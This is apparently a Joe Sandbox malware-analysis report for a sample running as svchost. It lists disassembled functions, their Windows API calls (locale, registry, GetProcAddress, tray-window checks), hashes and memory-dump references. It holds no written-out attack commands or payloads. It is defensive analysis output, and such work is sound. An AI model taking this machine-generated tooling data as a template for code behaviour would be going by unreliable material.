                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3782394904-0
                                                                                                                                                                    • Opcode ID: f743af0b18dfa3ed5a23374cd2d53fc59de07804623018730f6baf2c0fec996d
                                                                                                                                                                    • Instruction ID: 3d35fc62428985e93368d40339bec51adcb72c6fc1f370d370a503e3d59f8d60
                                                                                                                                                                    • Opcode Fuzzy Hash: f743af0b18dfa3ed5a23374cd2d53fc59de07804623018730f6baf2c0fec996d
                                                                                                                                                                    • Instruction Fuzzy Hash: CC214C74A08748EFDB11FBA9D84DB9ABBF4EB0B708F146399E4009B690D6749940EF14
                                                                                                                                                                    Function 03E34ABD Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 03E32F6C: GetKeyboardType.USER32(00000000), ref: 03E32F71
                                                                                                                                                                      • Part of subcall function 03E32F6C: GetKeyboardType.USER32(00000001), ref: 03E32F7D
                                                                                                                                                                    • GetCommandLineA.KERNEL32 ref: 03E34B23
                                                                                                                                                                    • GetVersion.KERNEL32 ref: 03E34B37
                                                                                                                                                                    • GetVersion.KERNEL32 ref: 03E34B48
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 03E34B84
                                                                                                                                                                      • Part of subcall function 03E32F9C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 03E32FBE
                                                                                                                                                                      • Part of subcall function 03E32F9C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,03E3300D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 03E32FF1
                                                                                                                                                                      • Part of subcall function 03E32F9C: RegCloseKey.ADVAPI32(?,03E33014,00000000,?,00000004,00000000,03E3300D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 03E33007
                                                                                                                                                                    • GetThreadLocale.KERNEL32 ref: 03E34B64
                                                                                                                                                                      • Part of subcall function 03E349F4: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,03E34A5A), ref: 03E34A1A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3734044017-0
                                                                                                                                                                    • Opcode ID: 53797f057a0c22b2cb5a3e06c843ef645a830fe852788c73a455ebf0b56772e8
                                                                                                                                                                    • Instruction ID: 84ca3d71978bd75236454497937b683ce17718ecdedec2366af0cedc1e414135
                                                                                                                                                                    • Opcode Fuzzy Hash: 53797f057a0c22b2cb5a3e06c843ef645a830fe852788c73a455ebf0b56772e8
                                                                                                                                                                    • Instruction Fuzzy Hash: C40180A9408399D9DB11FF73988D3DA3A61AF13744F14775D80405E399E7394145CF62
                                                                                                                                                                    Function 03E32F9C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 03E32FBE
                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,03E3300D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 03E32FF1
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,03E33014,00000000,?,00000004,00000000,03E3300D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 03E33007
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                    • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                                    • API String ID: 3677997916-4173385793
                                                                                                                                                                    • Opcode ID: abdd756626b98141ef79555a4a9e903fb89b7fcf554bb413a63df564a6c36b09
                                                                                                                                                                    • Instruction ID: 0b51058467841b43481f4048a692edef5fe58c0adc2c92cc9826cbe294de9c68
                                                                                                                                                                    • Opcode Fuzzy Hash: abdd756626b98141ef79555a4a9e903fb89b7fcf554bb413a63df564a6c36b09
                                                                                                                                                                    • Instruction Fuzzy Hash: D201D87D900348BEDB21EBD0CD46FEDB7BCDB05B00F1002A5BA14E7580E6759510DB64
                                                                                                                                                                    Function 03E39A3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetClassNameA.USER32(?,?,000000FA), ref: 03E39A63
                                                                                                                                                                    • CompareStringA.KERNEL32(00000400,00000001,?,?,Shell_TrayWnd,0000000D,?,?,000000FA), ref: 03E39A84
                                                                                                                                                                    • CompareStringA.KERNEL32(00000400,00000001,?,?,SysPager,00000008,00000400,00000001,?,?,Shell_TrayWnd,0000000D,?,?,000000FA), ref: 03E39AA7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareString$ClassName
                                                                                                                                                                    • String ID: Shell_TrayWnd$SysPager
                                                                                                                                                                    • API String ID: 3699413841-3765525915
                                                                                                                                                                    • Opcode ID: c17d1d1da51cbf3787cbf987cdfcfaff9ab4153940c553da0955b7c6d01a1480
                                                                                                                                                                    • Instruction ID: 00069a737dee63874101f19799a1c6f76ac489f8a4032fc20c6a90f7ec0dbf3e
                                                                                                                                                                    • Opcode Fuzzy Hash: c17d1d1da51cbf3787cbf987cdfcfaff9ab4153940c553da0955b7c6d01a1480
                                                                                                                                                                    • Instruction Fuzzy Hash: C901FF75A44248BADB20DBD48C46FEEB3B89B16700F045391BA55EB281D7F15A40DF51
                                                                                                                                                                    Function 03E36D1C Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,03E36DB3,?,?,00000000), ref: 03E36D34
                                                                                                                                                                      • Part of subcall function 03E36A94: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 03E36AB2
                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,03E36DB3,?,?,00000000), ref: 03E36D64
                                                                                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_00006C68,00000000,00000000,00000004), ref: 03E36D6F
                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,03E36DB3,?,?,00000000), ref: 03E36D8D
                                                                                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_00006CA4,00000000,00000000,00000003), ref: 03E36D98
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4102113445-0
                                                                                                                                                                    • Opcode ID: 5d39138ffed0c839060dd5c20a5f9f7424df2c91f11e5e54be7d0ba1c5ddcd7c
                                                                                                                                                                    • Instruction ID: c18e671fefcf49bc0f80f41af5e7b6a064c5f52ce06e6a89e98e2f41db562524
                                                                                                                                                                    • Opcode Fuzzy Hash: 5d39138ffed0c839060dd5c20a5f9f7424df2c91f11e5e54be7d0ba1c5ddcd7c
                                                                                                                                                                    • Instruction Fuzzy Hash: 1D01D479240708BED301F6B5CC4AF6E35ACDB43B20F912760E410EF6C4D6749E00C565
                                                                                                                                                                    Function 03E36DDD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 135threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,03E36F96,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 03E36DFB
                                                                                                                                                                      • Part of subcall function 03E36A94: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 03E36AB2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Locale$InfoThread
                                                                                                                                                                    • String ID: eeee$ggg$yyyy
                                                                                                                                                                    • API String ID: 4232894706-1253427255
                                                                                                                                                                    • Opcode ID: 14d6f72e47e31ad80f3850b647f5c5795d0be09a12afd98d1bb5a56a5216af1d
                                                                                                                                                                    • Instruction ID: 2fb384a9f4030cdf0cf1a7b7de5609c51799bd426788a2b4cfb5c07382dd32d7
                                                                                                                                                                    • Opcode Fuzzy Hash: 14d6f72e47e31ad80f3850b647f5c5795d0be09a12afd98d1bb5a56a5216af1d
                                                                                                                                                                    • Instruction Fuzzy Hash: 8941AF29704A056BC711EF79C8DC6FEF2B6EB87204FA43765E442AB344D725EA06C621
                                                                                                                                                                    Function 03E38270 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,03E38781,00000000,03E38794), ref: 03E38276
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 03E38287
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                    • API String ID: 1646373207-3712701948
                                                                                                                                                                    • Opcode ID: 5243a68da49ee02dec8a8eee4c44b36ac3ceca18a1e888b946e1f5c1a1aa7be9
                                                                                                                                                                    • Instruction ID: c772fcede3d97a74f2403b57cf9933309ea2282838aeba1dad66a5d82c52b219
                                                                                                                                                                    • Opcode Fuzzy Hash: 5243a68da49ee02dec8a8eee4c44b36ac3ceca18a1e888b946e1f5c1a1aa7be9
                                                                                                                                                                    • Instruction Fuzzy Hash: 44D05EB220979A4EDB00EAA7D8CCB9621689F4B104B313324F43479141EA74C4ACCA00
                                                                                                                                                                    Function 03E37000 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 03E3701C
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 03E37040
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(03E30000,?,00000105), ref: 03E3705B
                                                                                                                                                                    • LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 03E370FF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3990497365-0
                                                                                                                                                                    • Opcode ID: b3074ffe284d91f638c87374c6f4ffbe122223c615cfe0f3de58067210485ebd
                                                                                                                                                                    • Instruction ID: 6e16f87477f7161afbbd5de9e1da26f42304bf98b05db50a54c1d7656fc6333c
                                                                                                                                                                    • Opcode Fuzzy Hash: b3074ffe284d91f638c87374c6f4ffbe122223c615cfe0f3de58067210485ebd
                                                                                                                                                                    • Instruction Fuzzy Hash: 1141FEB5A0025C9FDB21EB69CC88BDEB7F9AB0A304F4452E5A508EB241D7749F84CF51
                                                                                                                                                                    Function 03E36FFE Relevance: 6.1, APIs: 4, Instructions: 107COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 03E3701C
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 03E37040
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(03E30000,?,00000105), ref: 03E3705B
                                                                                                                                                                    • LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 03E370FF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3990497365-0
                                                                                                                                                                    • Opcode ID: c6005ed739661d01dea6441276eca1a3294f204f60782bacfa3415bf0da49b01
                                                                                                                                                                    • Instruction ID: e9c791cc88252ee74d97494cb11d79ca95c7573d2605a7727a1b0ddca8fdf16e
                                                                                                                                                                    • Opcode Fuzzy Hash: c6005ed739661d01dea6441276eca1a3294f204f60782bacfa3415bf0da49b01
                                                                                                                                                                    • Instruction Fuzzy Hash: 09411DB5A0025C9FDB21EB69CC88BDEB7F9AB0A204F4452E5A508EB241D7749F84CF51
                                                                                                                                                                    Function 03E37D24 Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetStringTypeA.KERNEL32(00000809,00000002,?,00000080,?), ref: 03E37E1E
                                                                                                                                                                    • GetThreadLocale.KERNEL32 ref: 03E37D4E
                                                                                                                                                                      • Part of subcall function 03E37CAC: GetCPInfo.KERNEL32(00000000,?), ref: 03E37CC5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoLocaleStringThreadType
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1505017576-0
                                                                                                                                                                    • Opcode ID: c70e154ea09bcc56bd44360409151a74330964548f19a32559b5f9b660e9ee15
                                                                                                                                                                    • Instruction ID: 8a3635915a1a97aaf4e60be28f549a06e74f8ee2f72af26dfd71c7dd739c9626
                                                                                                                                                                    • Opcode Fuzzy Hash: c70e154ea09bcc56bd44360409151a74330964548f19a32559b5f9b660e9ee15
                                                                                                                                                                    • Instruction Fuzzy Hash: 3F3107A15013A8DAD722EB77AC0D3A777F8EB83208F485359D5848F2C5DB354844CB61
                                                                                                                                                                    Function 03E319E4 Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlInitializeCriticalSection.KERNEL32(03E3D5C4,00000000,03E31AAC,?,?,?,03E3240A), ref: 03E319FB
                                                                                                                                                                    • RtlEnterCriticalSection.KERNEL32(03E3D5C4,03E3D5C4,00000000,03E31AAC,?,?,?,03E3240A), ref: 03E31A0E
                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,00000FF8,03E3D5C4,00000000,03E31AAC,?,?,?,03E3240A), ref: 03E31A38
                                                                                                                                                                    • RtlLeaveCriticalSection.KERNEL32(03E3D5C4,03E31AB3,00000000,03E31AAC,?,?,?,03E3240A), ref: 03E31AA6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 730355536-0
                                                                                                                                                                    • Opcode ID: 4a09a9f231d30f3a6c70d17773b8393155694d445eccd379f159ede3b56248d9
                                                                                                                                                                    • Instruction ID: b54c4fee93dce392a8a5e38fa1fec6ba3a19def9542bdaf68c07070a1b5fe2a0
                                                                                                                                                                    • Opcode Fuzzy Hash: 4a09a9f231d30f3a6c70d17773b8393155694d445eccd379f159ede3b56248d9
                                                                                                                                                                    • Instruction Fuzzy Hash: 611190B8A48218EFDB15FF66C80DB5ABBE0EB47705F00A36CE0148B280C6B45901DB54
                                                                                                                                                                    Function 03E39238 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(?), ref: 03E39266
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?), ref: 03E39273
                                                                                                                                                                    • GetModuleHandleExA.KERNEL32(00000006,03E39238,?,00000000,?), ref: 03E39283
                                                                                                                                                                    • GetLastError.KERNEL32(00000006,03E39238,?,00000000,?), ref: 03E392A8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$HandleModule
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1090667551-0
                                                                                                                                                                    • Opcode ID: 2487f92d6b94e1f8fe7daf521ec0e26ce1a6626155e602586cd1e3c906f4f952
                                                                                                                                                                    • Instruction ID: 1177c059057d9c621da7baba1877315f62e829791363815a48b1181736406eb0
                                                                                                                                                                    • Opcode Fuzzy Hash: 2487f92d6b94e1f8fe7daf521ec0e26ce1a6626155e602586cd1e3c906f4f952
                                                                                                                                                                    • Instruction Fuzzy Hash: 45113C78E08748AFCB40DFA5C484AADFBF5BF49220F1596D5D854AB342E3B09A40CF90
                                                                                                                                                                    Function 03E3A45C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetWindowInfo.USER32(03E3A53E,?), ref: 03E3A46D
                                                                                                                                                                    • GetSystemMetrics.USER32(00000021), ref: 03E3A480
                                                                                                                                                                    • GetSystemMetrics.USER32(00000033), ref: 03E3A49B
                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 03E3A4A7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MetricsSystem$InfoWindow
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2832802444-0
                                                                                                                                                                    • Opcode ID: 215f2ad0ab65d35a76683250377d077abb9d391f45812362298032b999570b6a
                                                                                                                                                                    • Instruction ID: 47bc49de90ed04594d7011a49ecd0d5b3dc78756596661c0c458e1276d7dfbc2
                                                                                                                                                                    • Opcode Fuzzy Hash: 215f2ad0ab65d35a76683250377d077abb9d391f45812362298032b999570b6a
                                                                                                                                                                    • Instruction Fuzzy Hash: C5F05475D0130DAFDB40EFE5C94D6DDB7B8AF16250F1053A5A544EF280E6319A84CB51
                                                                                                                                                                    Function 03E39E3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 03E39C74: LoadLibraryA.KERNEL32(kernel32.dll,?), ref: 03E39CA7
                                                                                                                                                                      • Part of subcall function 03E39C74: GetProcAddress.KERNEL32(76680000,GetProcAddress), ref: 03E39CBC
                                                                                                                                                                      • Part of subcall function 03E39C74: LoadLibraryA.KERNEL32(user32.dll,?), ref: 03E39CD4
                                                                                                                                                                      • Part of subcall function 03E39C74: GetProcAddress.KERNEL32(767A0000,00000000), ref: 03E39CF6
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(03E39DA2,?,?,03E39DA2), ref: 03E39E63
                                                                                                                                                                    • PostMessageA.USER32(?,?,00000000,03E39DA2), ref: 03E39E7B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressLibraryLoadProc$CurrentMessagePostProcess
                                                                                                                                                                    • String ID: PostMessageA
                                                                                                                                                                    • API String ID: 1656095895-3140657398
                                                                                                                                                                    • Opcode ID: d50799e23a21cc18d2e5f0fcfa6d1ae3e6cacaf89010114c09e6911f04f6306b
                                                                                                                                                                    • Instruction ID: d037a2f3ad6bdc812db245db23fed1fc707427996a8da4dd29a116643399cfdf
                                                                                                                                                                    • Opcode Fuzzy Hash: d50799e23a21cc18d2e5f0fcfa6d1ae3e6cacaf89010114c09e6911f04f6306b
                                                                                                                                                                    • Instruction Fuzzy Hash: 93E0C9796053089FCB40EBDAD84CE96B3F9E74A615B142640F544DB252C775A840CB50

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:2.2%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                    Total number of Nodes:5
                                                                                                                                                                    Total number of Limit Nodes:1
                                                                                                                                                                    execution_graph 29875 100015d0 29876 10001603 29875->29876 29879 100015fa 29875->29879 29877 10001677 29878 100017b8 PostMessageA 29877->29878 29878->29876 29879->29876 29879->29877 29879->29878

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 004205E0 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
